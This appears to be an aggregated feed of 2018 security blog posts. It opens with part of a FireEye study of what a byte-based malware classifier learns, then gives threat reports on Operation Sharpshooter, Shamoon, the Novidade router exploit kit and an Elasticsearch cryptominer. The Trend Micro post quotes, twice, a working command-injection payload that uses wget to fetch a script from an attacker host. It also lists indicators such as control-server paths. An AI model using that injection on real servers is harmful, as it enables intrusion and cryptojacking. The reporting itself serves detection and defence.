On the left side of Figure 2, we show the two-dimensional representation of our byte embedding space with each of the clusters labeled, along with an outlier cluster labeled as -1. As you can see, the vast majority of bytes fall into one large catch-all class (Cluster 3), while the remaining three clusters have just two bytes each. Though there are no obvious semantic relationships in these clusters, the bytes that were included are interesting in their own right – for instance, Cluster 0 includes our special padding byte that is only used when files are smaller than the fixed-length cutoff, and Cluster 1 includes the ASCII character ‘r.’

What is more fascinating, however, is the set of outliers that the clustering produced, which are shown in the right side of Figure 3.  Here, there are a number of intriguing trends that start to appear. For one, each of the bytes in the range 0x0 to 0x6 are present, and these bytes are often used in short forward jumps or when registers are used as instruction arguments (e.g., eax, ebx, etc.). Interestingly, 0x7 and 0x8 are grouped together in Cluster 2, which may indicate that they are used interchangeably in our training data even though 0x7 could also be interpreted as a register argument. Another clear trend is the presence of several ASCII characters in the set of outliers, including ‘\n’, ‘A’, ‘e’, ‘s’, and ‘t.’ Finally, we see several opcodes present, including the call instruction (0xe8), loop and loopne (0xe0, 0xe2), and a breakpoint instruction (0xcc).

Given these findings, we immediately get a sense of what the classifier might be looking for in low-level features: ASCII text and usage of specific types of instructions.

Deciphering Low-Level Features

The next step in our analysis is to examine the low-level features learned by the first layer of convolutional filters. In our architecture, we used 96 convolutional filters at this layer, each of which learns basic building-block features that will be combined across the succeeding layers to derive useful high-level features. When one of these filters sees a byte pattern that it has learned in the current convolution, it will produce a large activation value and we can use that value as a method for identifying the most interesting bytes for each filter. Of course, since we are examining the raw byte sequences, this will merely tell us which file offsets to look at, and we still need to bridge the gap between the raw byte interpretation of the data and something that a human can understand. To do so, we parse the file using PEFile and apply BinaryNinja’s disassembler to executable sections to make it easier to identify common patterns among the learned features for each filter.

Since there are a large number of filters to examine, we can narrow our search by getting a broad sense of which filters have the strongest activations across our sample of 4,000 Windows PE files and where in those files those activations occur. In Figure 3, we show the locations of the 100 strongest activations across our 4,000-sample dataset. This shows a couple of interesting trends, some of which could be expected and others that are perhaps more surprising. For one, the majority of the activations at this level in our architecture occur in the ‘.text’ section, which typically contains executable code. When we compare the ‘.text’ section activations between malware and goodware subsets, there are significantly more activations for the malware set, meaning that even at this low level there appear to be certain filters that have keyed in on specific byte sequences primarily found in malware. Additionally, we see that the ‘UNKNOWN’ section– basically, any activation that occurs outside the valid bounds of the PE file – has many more activations in the malware group than in goodware. This makes some intuitive sense since many obfuscation and evasion techniques rely on placing data in non-standard locations (e.g., embedding PE files within one another).


Figure 3: Distribution of low-level activation locations across PE file headers and sections. Overall distribution of activations (Left), and activations for goodware/malware subsets (Right). UNKNOWN indicates an area outside the valid bounds of the file and NULL indicates an empty section name.

We can also examine the activation trends among the convolutional filters by plotting the top-100 activations for each filter across our 4,000 PE files, as shown in Figure 4. Here, we validate our intuition that some of these filters are overwhelmingly associated with features found in our malware samples. In this case, the activations for Filter 57 occur almost exclusively in the malware set, so that will be an important filter to look at later in our analysis. The other main takeaway from the distribution of filter activations is that the distribution is quite skewed, with only two filters handling the majority of activations at this level in our architecture. In fact, some filters are not activated at all on the set of 4,000 files we are analyzing.


Figure 4: Distribution of activations over each of the 96 low-level convolutional filters. Overall distribution of activations (Left), and activations for goodware/malware subsets (Right).

Now that we have identified the most interesting and active filters, we can disassemble the areas surrounding their activation locations and see if we can tease out some trends. In particular, we are going to look at Filters 83 and 57, both of which were important filters in our model based on activation value. The disassembly results for these filters across several of our ransomware artifacts is shown in Figure 5.

For Filter 83, the trend in activations becomes pretty clear when we look at the ASCII encoding of the bytes, which shows that the filter has learned to detect certain types of imports. If we look closer at the activations (denoted with a ‘*’), these always seem to include characters like ‘r’, ‘s’, ‘t’, and ‘e’, all of which were identified as outliers or found in their own unique clusters during our embedding analysis.  When we look at the disassembly of Filter 57’s activations, we see another clear pattern, where the filter activates on sequences containing multiple push instructions and a call instruction – essentially, identifying function calls with multiple parameters.

In some ways, we can look at Filters 83 and 57 as detecting two sides of the same overarching behavior, with Filter 83 detecting the imports and 57 detecting the potential use of those imports (i.e., by fingerprinting the number of parameters and usage). Due to the independent nature of convolutional filters, the relationships between the imports and their usage (e.g., which imports were used where) is lost, and that the classifier treats these as two completely independent features.


Figure 5: Example disassembly of activations for filters 83 (Left) and 57 (Right) from ransomware samples. Lines prepended with '*' contain the actual filter activations, others are provided for context.

Aside from the import-related features described above, our analysis also identified some filters that keyed in on particular byte sequences found in functions containing exploit code, such as DoublePulsar or EternalBlue. For instance, Filter 94 activated on portions of the EternalRomance exploit code from the BadRabbit artifact we analyzed. Note that these low-level filters did not necessarily detect the specific exploit activity, but instead activate on byte sequences within the surrounding code in the same function.

These results indicate that the classifier has learned some very specific byte sequences related to ASCII text and instruction usage that relate to imports, function calls, and artifacts found within exploit code. This finding is surprising because in other machine learning domains, such as images, low-level filters often learn generic, reusable features across all classes.

Bird’s Eye View of End-to-End Features

While it seems that lower layers of our CNN classifier have learned particular byte sequences, the larger question is: does the depth and complexity of our classifier (i.e., the number of layers) help us extract more meaningful features as we move up the hierarchy? To answer this question, we have to examine the end-to-end relationships between the classifier’s decision and each of the input bytes. This allows us to directly evaluate each byte (or segment thereof) in the input sequence and see whether it pushed the classifier toward a decision of malware or goodware, and by how much. To accomplish this type of end-to-end analysis, we leverage the SHapley Additive exPlanations (SHAP) framework developed by Lundberg and Lee. In particular, we use the GradientSHAP method that combines a number of techniques to precisely identify the contributions of each input byte, with positive SHAP values indicating areas that can be considered to be malicious features and negative values for benign features.

After applying the GradientSHAP method to our ransomware dataset, we noticed that many of the most important end-to-end features were not directly related to the types of specific byte sequences that we discovered at lower layers of the classifier. Instead, many of the end-to-end features that we discovered mapped closely to features developed from manual feature engineering in our traditional ML models. As an example, the end-to-end analysis on our ransomware samples identified several malicious features in the checksum portion of the PE header, which is commonly used as a feature in traditional ML models. Other notable end-to-end features included the presence or absence of certain directory information related to certificates used to sign the PE files, anomalies in the section table that define the properties of the various sections of the PE file, and specific imports that are often used by malware (e.g., GetProcAddress and VirtualAlloc).

In Figure 6, we show the distribution of SHAP values across the file offsets for the worm artifact of the WannaCry ransomware family. Many of the most important malicious features found in this sample are focused in the PE header structures, including previously mentioned checksum and directory-related features. One particularly interesting observation from this sample, though, is that it contains another PE file embedded within it, and the CNN discovered two end-to-end features related to this. First, it identified an area of the section table that indicated the ‘.data’ section had a virtual size that was more than 10x larger than the stated physical size of the section. Second, it discovered maliciously-oriented imports and exports within the embedded PE file itself. Taken as a whole, these results show that the depth of our classifier appears to have helped it learn more abstract features and generalize beyond the specific byte sequences we observed in the activations at lower layers.


Figure 6: SHAP values for file offsets from the worm artifact of WannaCry. File offsets with positive values are associated with malicious end-to-end features, while offsets with negative values are associated with benign features.

Summary

In this blog post, we dove into the inner workings of FireEye’s byte-based deep learning classifier in order to understand what it, and other deep learning classifiers like it, are learning about malware from its unstructured raw bytes. Through our analysis, we have gained insight into a number of important aspects of the classifier’s operation, weaknesses, and strengths:

  • Import Features: Import-related features play a large role in classifying malware across all levels of the CNN architecture. We found evidence of ASCII-based import features in the embedding layer, low-level convolutional features, and end-to-end features.
  • Low-Level Instruction Features: Several features discovered at the lower layers of our CNN classifier focused on sequences of instructions that capture specific behaviors, such as particular types of function calls or code surrounding certain types of exploits. In many cases, these features were primarily associated with malware, which runs counter to the typical use of CNNs in other domains, such as image classification, where low-level features capture generic aspects of the data (e.g., lines and simple shapes). Additionally, many of these low-level features did not appear in the most malicious end-to-end features.
  • End-to-End Features: Perhaps the most interesting result of our analysis is that many of the most important maliciously-oriented end-to-end features closely map to common manually-derived features from traditional ML classifiers. Features like the presence or absence of certificates, obviously mangled checksums, and inconsistencies in the section table do not have clear analogs to the lower-level features we uncovered. Instead, it appears that the depth and complexity of our CNN classifier plays a key role in generalizing from specific byte sequences to meaningful and intuitive features.

It is clear that deep learning offers a promising path toward sustainable, cutting-edge malware classification. At the same time, significant improvements will be necessary to create a viable real-world solution that addresses the shortcomings discussed in this article. The most important next step will be improving the architecture to include more information about the structural, semantic, and syntactic context of the executable rather than treating it as an unstructured byte sequence. By adding this specialized domain knowledge directly into the deep learning architecture, we allow the classifier to focus on learning relevant features for each context, inferring relationships that would not be possible otherwise, and creating even more robust end-to-end features with better generalization properties.

The content of this blog post is based on research presented at the Conference on Applied Machine Learning for Information Security (CAMLIS) in Washington, DC on Oct. 12-13, 2018. Additional material, including slides and a video of the presentation, can be found on the conference website.

Operation Sharpshooter targets critical infrastructure and global defense

McAfee uncovered a campaign tracked as Operation Sharpshooter that hit at least 87 organizations in global defense and critical infrastructure.

Security experts at McAfee uncovered a hacking campaign, tracked as Operation Sharpshooter, aimed at infrastructure companies worldwide. The threat actors are using malware associated with Lazarus APT group that carried out Sony Pictures attack back in 2014.

The current campaign os targeting nuclear, defense, energy, and financial companies, experts believe attackers are gather intelligence to prepare future attacks.

“In October and November 2018, the Rising Sun implant has appeared in 87 organizations across the globe, predominantly in the United States, based on McAfee telemetry and our analysis.” reads the analysis published by McAfee.

“Based on other campaigns with similar behavior, most of the targeted organizations are English speaking or have an English-speaking regional office. This actor has used recruiting as a lure to collect information about targeted individuals of interest or organizations that manage data related to the industries of interest.”

Operation Sharpshooter

Threat actors are carrying out spear phishing attacks with a link poining to weaponized Word documents purporting to be sent by a job recruiter. The messages are in English and include descriptions for jobs at unknown companies, URLs associated with the documents belongs to a US-based IP address and to the Dropbox service.

The macros included in the malicious document uses an embedded shellcode to inject the Sharpshooter downloader into Word’s memory.

The macros act as a downloader for a second-stage implant dubbed Rising Sun that runs in memory and collects intelligence about the machine (network adapter information, computer name, username, IP address information, OS information, drive and process information, and other native system data). 
The Rising Sun implements tens of backdoor capabilities, including the abilities to terminate processes and write files to disk.

The binary is downloaded in the startup folder to gain persistence on the infected system. Experts observed that attackers behind the Operation Sharpshooter also downloads a second harmless Word document from the control server, most likely as a decoy to hide the malware.

The malware sends collected data to the C2 in an encrypted format, it uses the RC4 algorithm and encodes the encrypted data with Base64.

The control infrastructure is composed of servers located in the US, Singapore, and France.

Experts highlighted that the Rising Sun uses source code from Trojan Duuzer, a backdoor used by Lazarus Group in Sony attacks.

“This campaign, Operation Sharpshooter, leverages an in-memory implant to download and retrieve a second-stage implant—which we call Rising Sun—for further exploitation. According to our analysis, the Rising Sun implant uses source code from the Lazarus Group’s 2015 backdoor Trojan Duuzer in a new framework to infiltrate these key industries.” continues the report.

Experts found other similarities, for example the documents that are being used to distribute Rising Sun contain metadata indicating they were created using a Korean-language version of Word.

Experts found many similarities between the malware used in the 
Operation Sharpshooter and the one used in the Sony hack, experts also found similarities in tactics, techniques, and procedures used by the attackers and the Lazarus Group.

Experts believe that threat actors behind Operation Sharpshooter are planting false flags to make attribution more difficult.

Further details on the campaign, including IoCs are reported in the analysis published by McAfee.

Pierluigi Paganini

(Security Affairs – Operation Sharpshooter, hacking)



The post Operation Sharpshooter targets critical infrastructure and global defense appeared first on Security Affairs.

Hacking democracy efforts continue with upticks in malware deployments

Comodo Cybersecurity released its Global Threat Report 2018 Q3, offering insights from Comodo Threat Research Lab experts into key cyberthreat trends and the impact of malware on elections and other geopolitical events. Hacking democracy and malware in conflict zones The Comodo Q3 report also reveals disturbing upticks in malware deployment leading up to major national elections. Comodo Cybersecurity researchers document the impact of malware on elections in Russia, Turkey, Mali, Sierra Leone, Azerbaijan and Columbia. … More

The post Hacking democracy efforts continue with upticks in malware deployments appeared first on Help Net Security.

A new variant of Shamoon was uploaded to Virus Total while Saipem was under attack

A new variant of the Shamoon malware, aka DistTrack, was uploaded to VirusTotal from Italy this week, but experts haven’t linked it to a specific attack yet.

Shamoon was first observed in 2012 when it infected and wiped more than 30,000 systems at Saudi Aramco and other oil companies in the Middle East.

Four years later, a new version (Shamoon 2) appeared in the threat landscape, it was involved in a string of cyber attacks aimed at various organizations in the Persian Gulf, including Saudi Arabia’s General Authority of Civil Aviation (GACA). 

A second variant of the same threat was discovered by researchers at Palo Alto Networks in January 2017 and it was able to target virtualization products.

DistTrack is able to wipe data from hard drives of the infected systems and render systems unusable. Like other malware, Shamoon leverages Windows Server Message Block (SMB) to spread among systems of the target network.

The code of the original Shamoon includes a list of hard-coded domain credentials used to the target a specific organization and steal credentials, but a variant uploaded to VirusTotal this week doesn’t contain these credentials.

Google security firm Chronicle discovered a file containing Shamoon uploaded to its VirusTotal database.

“The new Shamoon was set to detonate on Dec. 7, 2017, at 11:51 pm, but only uploaded yesterday.reported  Axios website.

“Chronicle notes that attackers may have set the attack date to the past — perhaps by changing 2018 to 2017 — in order to start an attack immediately. Another possibility, said Brandon Levene, head of applied intelligence at Chronicle, is that the malware was compiled in the past as part of preparations for a later attack.”

Unlike the Shamoon2, the new version contains a much longer filename list used for selecting a dropped executable name. The new list does not overlap with previously observed versions of Shamoon.

The new variant presents other anomalies, for example, the list of the command and control server was blank. Experts at Chronicle believe that attackers may have a different connection to the host network and manually install Shamoon.

Another difference is that Shamoon in the past has replaced all files with images that had political significance. The latest variant irreversibly encrypts the files.

The file was uploaded on VirusTotal from Italy and malicious files were discovered at around the time Italian oil services company Saipem announced to have suffered a cyber attack.

“While Chronicle cannot directly link the new Shamoon variant to an active attack, the timing of the malware files comes close to news of an attack on an Italian energy corporation with assets in the Middle East.” 
Chronicle noted in a statement.

Pierluigi Paganini

(Security Affairs – Wiper, malware)

The post A new variant of Shamoon was uploaded to Virus Total while Saipem was under attack appeared first on Security Affairs.

Criminals, Not State Actors, Target Russian Oil Company in 3-Year Cyber Attack

Security researchers have uncovered a three-year cyber attack on a Russian oil company that appeared at first glance to be state-sponsored, but later was found to be the work of cyber criminals seeking financial gain. The discovery is a cautionary tale for security experts not to be too rash when  when drawing conclusions about high-profile cyber...

Read the whole entry... »

Related Stories

Nasty Android malware found stealing its victims’ PayPal funds

By Waqas

Another day, another Android malware – This time, according to the latest findings of ESET’s IT security researchers, there is a new malware in Google Play Store that hijacks PayPal account to steal money – Researchers assessed that the malware is specifically targeting Android users and steals no less than $1,000. The malware was first […]

This is a post from HackRead.com Read the original post: Nasty Android malware found stealing its victims’ PayPal funds

‘Operation Sharpshooter’ Targets Global Defense, Critical Infrastructure

This post was written with contributions from the McAfee Advanced Threat Research team.  

The McAfee Advanced Threat Research team and McAfee Labs Malware Operations Group have discovered a new global campaign targeting nuclear, defense, energy, and financial companies, based on McAfee® Global Threat Intelligence. This campaign, Operation Sharpshooter, leverages an in-memory implant to download and retrieve a second-stage implant—which we call Rising Sun—for further exploitation. According to our analysis, the Rising Sun implant uses source code from the Lazarus Group’s 2015 backdoor Trojan Duuzer in a new framework to infiltrate these key industries.

Operation Sharpshooter’s numerous technical links to the Lazarus Group seem too obvious to immediately draw the conclusion that they are responsible for the attacks, and instead indicate a potential for false flags. Our research focuses on how this actor operates, the global impact, and how to detect the attack. We shall leave attribution to the broader security community.

Read our full analysis of Operation Sharpshooter.

Have we seen this before?

This campaign, while masquerading as legitimate industry job recruitment activity, gathers information to monitor for potential exploitation. Our analysis also indicates similar techniques associated with other job recruitment campaigns.

Global impact

In October and November 2018, the Rising Sun implant has appeared in 87 organizations across the globe, predominantly in the United States, based on McAfee telemetry and our analysis. Based on other campaigns with similar behavior, most of the targeted organizations are English speaking or have an English-speaking regional office. This actor has used recruiting as a lure to collect information about targeted individuals of interest or organizations that manage data related to the industries of interest. The McAfee Advanced Threat Research team has observed that the majority of targets were defense and government-related organizations.

Targeted organizations by sector in October 2018. Colors indicate the most prominently affected sector in each country. Source: McAfee® Global Threat Intelligence.

Infection flow of the Rising Sun implant, which eventually sends data to the attacker’s control servers.

 

Conclusion

Our discovery of this new, high-function implant is another example of how targeted attacks attempt to gain intelligence. The malware moves in several steps. The initial attack vector is a document that contains a weaponized macro to download the next stage, which runs in memory and gathers intelligence. The victim’s data is sent to a control server for monitoring by the actors, who then determine the next steps.

We have not previously observed this implant. Based on our telemetry, we discovered that multiple victims from different industry sectors around the world have reported these indicators.

Was this attack just a first-stage reconnaissance operation, or will there be more? We will continue to monitor this campaign and will report further when we or others in the security industry receive more information. The McAfee Advanced Threat Research team encourages our peers to share their insights and attribution of who is responsible for Operation Sharpshooter.

 

Indicators of compromise

MITRE ATT&CK™ techniques

  • Account discovery
  • File and directory discovery
  • Process discovery
  • System network configuration discovery
  • System information discovery
  • System network connections discovery
  • System time discovery
  • Automated exfiltration
  • Data encrypted
  • Exfiltration over command and control channel
  • Commonly used port
  • Process injection

Hashes

  • 8106a30bd35526bded384627d8eebce15da35d17
  • 66776c50bcc79bbcecdbe99960e6ee39c8a31181
  • 668b0df94c6d12ae86711ce24ce79dbe0ee2d463
  • 9b0f22e129c73ce4c21be4122182f6dcbc351c95
  • 31e79093d452426247a56ca0eff860b0ecc86009

Control servers

  • 214.99.20/view_style.php
  • 74.41.56/board.php
  • com.sg/board.php

Document URLs

  • hxxp://208.117.44.112/document/Strategic Planning Manager.doc
  • hxxp://208.117.44.112/document/Business Intelligence Administrator.doc
  • hxxp://www.dropbox.com/s/2shp23ogs113hnd/Customer Service Representative.doc?dl=1

McAfee detection

  • RDN/Generic Downloader.x
  • Rising-Sun
  • Rising-Sun-DOC

 

The post ‘Operation Sharpshooter’ Targets Global Defense, Critical Infrastructure appeared first on McAfee Blogs.

TrendLabs Security Intelligence Blog: Cryptocurrency Miner Spreads via Old Vulnerabilities on Elasticsearch

by Jindrich Karasek and Loseway Lu

We detected mining activity on our honeypot that involves the search engine Elasticsearch, which is a Java-developed search engine based on the Lucene library and released as open-source. The attack was deployed by taking advantage of known vulnerabilities CVE-2015-1427, a vulnerability in its Groovy scripting engine that allows remote attackers to execute arbitrary shell commands through a crafted script, and CVE-2014-3120, a vulnerability in the default configuration of Elasticsearch. The vulnerable versions are no longer supported by Elasticsearch.

We found a search query with the following command (also described in a blog by ISC) on a server running Elasticsearch:

“{“lupin”:{“script”: “java.lang.Math.class.forName(\”java.lang.Runtime\”).getRuntime().exec(\”wget hxxp://69[.]30[.]203[.]170/gLmwDU86r9pM3rXf/update.sh -P
/tmp/sssooo\”).getText()”}}}”

The command was run by the same system/attacking host, which also hosted the payload. At the time of writing, the IP is resolved to the domain name matrixhazel[.]com, which was inaccessible. The system was also found to have installed CentOS 6, which runs both web and SSH servers.

Figure 1. GreyNoise marked the host as a known scanner

Figure 1. GreyNoise marked the host as a known scanner

It is important to note that this kind of attack is not new, but it has recently reemerged. For instance, Trend Micro Smart Protection Network feedback in November detected the cryptocurrency miner on endpoints in several countries such as China, Taiwan, and the United States.

The miner distributes the bash script update.sh by first invoking the shell and running the download command with output set in the “/tmp/sssooo” file. “/tmp” is used because it has less restrictive permissions on most systems by default.

This attack is relatively simple, yet can have a significant impact on the victim. Once the attacker gains the ability to run arbitrary commands on the system, he can attempt to escalate the privileges or even pivot to other systems in order to compromise the network further.

It should also be noted that while the scheme of the attack is the same in most cases, the payloads might differ. In this case that we analyzed, the payload was the file update.sh. Once run, the bash script update.sh downloads two files called devtools and config.json. The script then deploys the cryptocurrency miner (detected by Trend Micro as Coinminer.Linux.MALXMR.UWEIS).

The actual file with the miner’s ELF64 binary is named devtools, which helps disguise the miner, as “devtools” is also a regular tool on GitHub. The miner uses a configuration as stated in the file config.json.

Figure 2. Details of the configuration file config.json

Figure 2. Details of the configuration file config.json

Such a scheme is already widely used, but the wrapper bash script has several other interesting functions. The coding style is very similar to hacking tools, and parts of the code were also spotted in an Xbash-related case before.

How the cryptocurrency miner is deployed

The miner consists of three files, downloaded through either wget, curl, or url commands in bash:

Figure 3. wget, curl, and url commands

Figure 3. wget, curl, and url commands

The miner is capable of downloading the following:

  • Devtools – The actual miner;
  • Update.sh – The bash script used to download all the parts (The script is also run during the attack.);
  • Config.json – The configuration file for the miner.

First, it attempts to save the files into the “/etc/” directory, and tries the “/tmp” in case it fails. The latter was the success in our case. After that, it checks for other ongoing mining activity in the machine. It assumes the device has already been attacked, and hijacks the machine from its previous attacker. This process may also be used to update the running miner to a newer version.

Figure 4. Sample of commands that allow the miner to eliminate other existing miners

Figure 4. Sample of commands that allow the miner to eliminate other existing miners

If it detects other miners in the system, the running processes related to the miners will be killed. It also resets the crontab so cron won’t start other miners again.

Figure 5. Processes of other miners found in the system will be killed

Figure 5. Processes of other miners found in the system will be killed

The miner adds itself to the crontab so it’s run every 10 minutes. At the beginning of each run, it unlocks itself with “chattr -i“ and updates its files, while at the end of each run it protects the files with “chattr +i” which serves to prevent the file from modification or removal by other low privilege users. It also cleans its tracks by emptying the history logs (as seen in Figure 8). One interesting point is when the script is running in the root directory, the script tries to add its own SSH key to the authorized_keys, which allows it to login without a password. Somehow the command order looks buggy, causing the removal of authorized_keys right after the key is added.

Figure 6. Other miner capabilities: components protection, persistence via crontab, and network traffic encryption

Figure 6. Other miner capabilities: components protection, persistence via crontab, and network traffic encryption

Figure 7. Miner modifies the iptables/firewall in the system

Figure 7. Miner modifies the iptables/firewall in the system

Figure 8. Miner cleans its track by removing the history and emptying files

Figure 8. Miner cleans its track by removing the history and emptying files

Conclusion and Recommendations

To prevent attacks that exploit known vulnerabilities in Elasticsearch, it is necessary to patch systems regularly and have security monitoring in place with custom rules, which allows for the detection of basic events as well as complex alerts.

There are variations to the command injected in Elasticsearch as spotted in the wild, but they have these factors in common:

  • They all invoke shell to run a command;
  • They all contain a command to download a file from remote/local locations, like curl, wget, url, ftp/get, and so on;
  • They download the file into either “/etc” or “/tmp”;
  • They are usually tried in sequence as the host tries to use all combinations of download file locations and commands to be run on local system (in order to download the malicious file).

Detection of related attacks is crucial and should be done through these measures:

  • Log Elasticsearch usage and monitor for strings that may suggest command injection.
  • Monitor the system’s behavior. Shell should only be used by authorized users and solutions.
  • Classify network traffic through correlation. In our case, malicious IP would be regularly called every 10 minutes. This should be easy to spot with the right network monitoring process and traffic analysis in place.

Users can consider adopting security solutions that can defend against cryptocurrency-mining malware through a cross-generational blend of threat defense techniques. Trend Micro™ XGen™ security provides high-fidelity machine learning that can secure the gateway and endpoints, and protect physical, virtual, and cloud workloads. With technologies that employ web/URL filtering, behavioral analysis, and custom sandboxing, XGen security offers protection against ever-changing threats that bypass traditional controls and exploit known and unknown vulnerabilities. XGen security also powers Trend Micro’s suite of security solutions: Hybrid Cloud Security, User Protection, and Network Defense.

Indicators of Compromise (IoCs)

Related hashes (SHA-256)
191f1126f42b1b94ec248a7bbb60b354f2066b45287cd1bdb23bd39da7002a8c devtools Coinminer.Linux.MALXMR.UWEIS
d3e1231d1429dccb47caf0c1c46d2eb24afe33887b31a818b8f07f0406db2637 update.sh Coinminer.SH.MALXMR.ATNL

69.30.211.82 – attacker
69.30.203.170

Command used in Elasticsearch:

“{“lupin”:{“script”: “java.lang.Math.class.forName(\”java.lang.Runtime\”).getRuntime().exec(\”wget hxxp://69[.]30[.]203[.]170/gLmwDU86r9pM3rXf/update.sh -P /tmp/sssooo\”).getText()”}}}”

Spoofed Elasticsearch version number: 1.4.1

The post Cryptocurrency Miner Spreads via Old Vulnerabilities on Elasticsearch appeared first on .



TrendLabs Security Intelligence Blog

Novidade, a new Exploit Kit is targeting SOHO Routers

Security experts at Trend Micro have discovered a new exploit kit, dubbed Novidade (“novelty” in Portuguese), that is targeting SOHO routers to compromise the devices connected to the network equipment.

The Novidade exploit kit leverages cross-site request forgery (CSRF) to change the Domain Name System (DNS) settings of SOHO routers and redirect traffic from the connected devices to the IP address under the control of the attackers.

Since its first discovery in August 2017, experts observed three variants of the exploit kit, including one involved in the DNSChanger system of a recent GhostDNS campaign.

Currently, Novidade is used in different campaigns, experts believe it has been sold to multiple threat actors or its source code leaked.

Most of the campaigns discovered by the researchers leverages phishing attacks to retrieve banking credentials in Brazil. Experts also observed campaigns with no specific target geolocation, a circumstance that suggests attackers are expanding their target areas or a larger number of threat actors are using the exploit kit. 

“We found Novidade being delivered through a variety of methods that include malvertising, compromised website injection, and via instant messengers.” reads the analysis published by Trend Micro.

Novidade eK

Experts noticed that the landing page performs HTTP requests generated by JavaScript Image function to a predefined list of local IP addresses that are used by routers. Once established a connection, the Novidade toolkit queries the IP address to download an exploit payload encoded in base64.

The exploit kit blindly attacks the detected IP address with all its exploits. 

The malicious code also attempts to log into the router with a set of default credentials and then executes a CSRF attack to change the DNS settings.

“Once the router is compromised, all devices connected to it are vulnerable to additional pharming attacks.” continues the analysis.

All the variants of Novidade exploit kit observed by Trend Micro share the same attack chain, but the latest version improves the code on the landing page and adds a new method of retrieving the victim’s local IP address. 

Below the list of possible affected router models based on Trend Micro comparisons of the malicious code, network traffic, and published PoC code. 

  • A-Link WL54AP3 / WL54AP2 (CVE-2008-6823)
  • D-Link DSL-2740R
  • D-Link DIR 905L
  • Medialink MWN-WAPR300 (CVE-2015-5996)
  • Motorola SBG6580
  • Realtron
  • Roteador GWR-120
  • Secutech RiS-11/RiS-22/RiS-33 (CVE-2018-10080)
  • TP-Link TL-WR340G / TL-WR340GD
  • TP-Link WR1043ND V1 (CVE-2013-2645)

Novidade was used mostly to target Brazilian users, the largest campaign has delivered the exploit kit 24 million times since March. 

In September and October, the Novidade was delivered through notifications on instant messengers regarding the 2018 Brazil presidential election, and leveraging compromised websites injected with an iframe to redirect users to Novidade. The latter attack hit websites worldwide.

Trend Micro recommends to keep devices’ firmware up to date, change the default usernames and passwords on their routers, and also change the router’s default IP address. If not needed, disabling remote access is also recommended, as well as using secure web connections (HTTPS) to access sensitive websites to prevent pharming attacks.

Pierluigi Paganini

(Security Affairs – Novidade exploit kit, hacking)

The post Novidade, a new Exploit Kit is targeting SOHO Routers appeared first on Security Affairs.

6.8% of the top 100,000 websites still accept old, insecure SSL versions

Mac-based malware has appeared on the list of the top ten most common types of malware for the first time in WatchGuard’s quarterly Internet security report. The Mac scareware appeared in sixth place in WatchGuard’s latest Q3 2018 report and is primarily delivered by email to trick victims into installing fake cleaning software. Researchers also found that 6.8 percent of the world’s top 100,000 websites still accept old, insecure versions of the SSL encryption protocol, … More

The post 6.8% of the top 100,000 websites still accept old, insecure SSL versions appeared first on Help Net Security.

Android Trojan steals money from victims’ PayPal account

ESET researchers have unearthed a new Android Trojan that tricks users into logging into PayPal, then takes over and mimics the user’s clicks to send money to the attacker’s PayPal address. The heist won’t go unnoticed by the victim if they are looking at the phone screen, but they will also be unable to do anything to stop the transaction from being executed as it all happens in a matter of seconds. The only thing … More

The post Android Trojan steals money from victims’ PayPal account appeared first on Help Net Security.

November 2018: Most wanted malware exposed

Check Point has published its latest Global Threat Index for November 2018. The index reveals that the Emotet botnet has entered the Index’s top 10 ranking after researchers saw it spread through several campaigns, including a Thanksgiving-themed campaign. This involved sending malspam emails in the guise of Thanksgiving cards, containing email subjects such as happy “Thanksgiving day wishes”, “Thanksgiving wishes” and “the Thanksgiving day congratulation!” These emails contained malicious attachments, often with file names related … More

The post November 2018: Most wanted malware exposed appeared first on Help Net Security.

Blog | Avast EN: 10 Simple Tips to Protect You from an Email Hack | Avast

Email remains the most common form of communication today. It’s also the unique identifier for many online account logins, which is the reason it’s still highly targeted by cybercriminals. Once hacked, it can lead to spamming your friends or, worse, identity theft for you. And you have to consider that your reputation and finances could very much be affected.



Blog | Avast EN

Security Affairs: Group-IB identifies leaked credentials of 40,000 users of government websites in 30 countries

Group-IB, an international company that specializes in preventing cyberattacks, has detected more than 40 000 compromised user credentials of online government services in 30 countries around the world.

Most of the victims were in Italy (52%), Saudi Arabia (22%) and Portugal (5%). Users’ data might have been sold on underground hacker forums or used in targeted attacks to steal money or exfiltrate sensitive information. CERT-GIB (Group-IB’s Computer Emergency Response Team) upon identification of this information promptly warned CERTs of the affected countries about the threat so that risks could be mitigated.

Group-IB Threat Intelligence has detected government websites’ user accounts compromised by cyber criminals in 30 countries. Official government portals including Poland (gov.pl), Romania (gov.ro),Switzerland (admin.ch), the websites of Italian Ministry of Defense (difesa.it), Israel Defense Forces(idf.il), the Government of Bulgaria (government.bg), the Ministry of Finance of Georgia (mof.ge),Norwegian Directorate of Immigration (udi.no), the Ministries of Foreign Affairs of Romania and Italyand many other government agencies were affected by the data compromise.

Government employees, military and civilian citizens who had accounts on official government portals of France (gouv.fr), Hungary (gov.hu) and Croatia (gov.hr) became victims of this data compromise. In total Group-IB Threat Intelligence system has detected more than 40 000 comprised user accounts of the largest government websites in 30 countries across the world over the past year and a half – Italy (52%), Saudi Arabia (22%) and Portugal (5%) were affected most.

According to Group-IB experts, cyber criminals stole user accounts’ data using special spyware – form grabbers, keyloggers, such as Pony Formgrabber, AZORult and Qbot (Qakbot). Phishing emails were sent to personal and corporate email accounts. The infection came from a malware included as an email attachment disguised as a legitimate file or archive. Once opened, it ran a Trojan aimed at stealing personal information. For instance, Pony Formgrabber retrieves login credentials from configuration files, databases, secret storages of more than 70 programs on the victim’s computer and then sends stolen information to cyber criminals’ C&C server. Another Trojan-stealer — AZORult, aside from stealing passwords from popular browsers, is capable of stealing crypto wallets data. Qbot worm gathers login credentials through use of keylogger, steals cookie files and certificates, active internet sessions, and forwards users to fake websites.

The stolen user accounts data is usually sorted by subject (banks’ client data, government portals user accounts, combo lists – email & password) and goes for sale on underground hacker forums. It is worth noting that government websites’ user accounts are less common on the forums. Cyber criminals and state-sponsored APT-groups, specialized in sabotage and espionage, are among those who can buy this information. Knowing the credentials of government websites’ users, hackers can not only obtain classified information from these websites, but also infiltrate government networks. Even one compromised government employee’s account can lead to the theft of commercial or state secrets.

“The scale and simplicity of government employees’ data compromise shows that users, due to their carelessness and lack of reliable cyber defense, fall victims to hackers, – commented Alexandr Kalinin,head of Group-IB’s Computer Emergency Response Team (CERT-GIB). – Malware used by cyber criminals to compromise user accounts continue to evolve. For better protection against this type of attacks, it is indeed important to not only use most up-to-date anti-APT solutions, but also to know the context of the attacks:  when, where and how exactly your data was compromised”.

